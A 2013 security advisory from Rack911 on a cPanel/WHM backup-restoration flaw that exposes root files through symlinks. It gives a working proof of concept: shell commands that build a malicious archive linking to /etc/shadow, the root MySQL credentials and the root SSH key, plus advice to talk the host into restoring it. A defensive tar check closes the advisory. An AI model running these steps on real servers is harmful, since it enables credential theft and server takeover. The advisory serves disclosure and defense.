cPanel – Backup Restoration Content Disclosure (R911-0007)

Type: Content Disclosure (Root Access)
Impact: High
Product: cPanel
Website: http://www.cpanel.net
Vulnerable Version: 11.38.0.8 and earlier.
Fixed Version: -
CVE: -
R911: 0007
Date: 2013-05-22
By: http://www.rack911.com

Product Description:

cPanel is an easy-to-use control panel that gives web hosts and the website owners they serve, the ability to quickly and easily manage their servers and websites. Web Host Manager (WHM) is a part of the cPanel software, often used by resellers and system administrators.

Vulnerability Description:

There is a flaw within the import / restore feature that allows an attacker to use a malicious archive to gain access to sensitive files via a symlink attack due to an incorrect handling of the domain log files. When the malicious archive is restored the symlinks become normal files that can then be backed up and viewed by the user.

Note: In order for this vulnerability to work, the attacker must social engineer the hosting company to restore the malicious archive. However, because transferring and restoring accounts is such a common practice in the hosting world we believe this exploit to be trivial to perform.

Proof of Concept:

Here are the steps to create a malicious cPanel archive that when restored will allow you to view /etc/shadow, the root MySQL password in plain-text and the default root SSH private key. For demonstration purposes, we will be using attacker.com as our website and have already setup three sub domains:

rootmysql.attacker.com
rootssh.attacker.com
shadow.attacker.com

The sub domains are necessary as this attack revolves around the ability to use symlinks pointing to existing domain log files that when restored will then be converted to the actual file.

1. Log into your cPanel account and go to Backups and then Generate a Full Website Backup.

2. If you have SSH access on the same server you can log in, otherwise download the original archive to your computer and upload to another server where you do have SSH access.

3. Prepare the archive:

tar -xvf backup*.tar.gz
rm backup*.tar.gz
mv backup* cpmove-attack
cd cpmove-attack/logs

4. Prepare the malicious symlinks:

ln -s /etc/shadow shadow.attacker.com
ln -s /root/.my.cnf rootmysql.attacker.com
ln -s /root/.ssh/id_dsa rootssh.attacker.com

5. Repackage the archive:

cd ../../
tar -zcf cpmove-attack.tar.gz cpmove-attack

At this point the malicious archive has been built and you can upload it to the target server and then restore it via WHM using the Restore a Full Backup/cpmove File feature. Another option would be to restore it from the command line:

/scripts/restorepkg –force cpmove-attack.tar.gz

Once the archive has been restored on the target server, log into cPanel as the user and then go back to Backups and then Generate a Full Website Backup. After the new backup has been generated, download it to your computer and extract the contents. There will be a logs directory located under the archive name containing the target files. Simply open them with a text editor and there you go.

Impact:

We have deemed this vulnerability to be rated as HIGH due to the fact that any file can be viewed regardless of ownership, including root files such as /etc/shadow, the MySQL root password and any private SSH keys. (It is also possible to grab multiple files at once using several symlink attacks within one malicious archive.)

It’s important to note that cPanel has deemed this vulnerability to be “minor” in their eyes which we view to be extremely reckless towards the security of every hosting provider out there. It is their opinion that web hosting providers should not transfer or restore accounts from untrusted sources. As we all know, this practice is extremely common with shared hosting and especially reseller hosting providers.

We cannot stress enough how inexcusable it is for cPanel to view this flaw as a minor vulnerability. An attacker could create their own malicious archive in minutes and come up with 100 different plausible excuses to have their hosting provider restore the archive without so much of a second thought. We’re trying to make the hosting community safer, but we cannot do it when companies such as cPanel continue to act like this.

Work Around:

To hosting providers who would like to help mitigate the risks of the above vulnerability, what we suggest for the time being is to run the following command against all archives that you are about to restore to check for the presence of a possible symlink attack:

tar -ztvf archive.tar.gz | grep ‘ -> ‘ |grep -v public_html

If the archive is fine you will not see anything. However, if there is a possible symlink attack present than the output will look like this:

root@server [~]# tar -ztvf cpmove-attack.tar.gz | grep ‘ -> ‘ |grep -v public_html
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootmysql.attacker.com -> /root/.my.cnf
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/shadow.attacker.com -> /etc/shadow
lrwxrwxrwx attack/attack     0 2013-05-22 15:32 cpmove-attack/logs/rootssh.attacker.com -> /root/.ssh/id_dsa
root@server [~]#

Should you see results like that, you are urged to not restore the backup under any circumstances and presume that the user is attempting to compromise your security. For now, this is our best advice but we are working on a better (automated) solution that can be worked into the existing cPanel restore feature. Stay tuned for details, we hope to have something out this week.

Vulnerable Version:

This vulnerability was tested against cPanel (WHM) v11.38.0.8 and is believed to exist in all previous versions.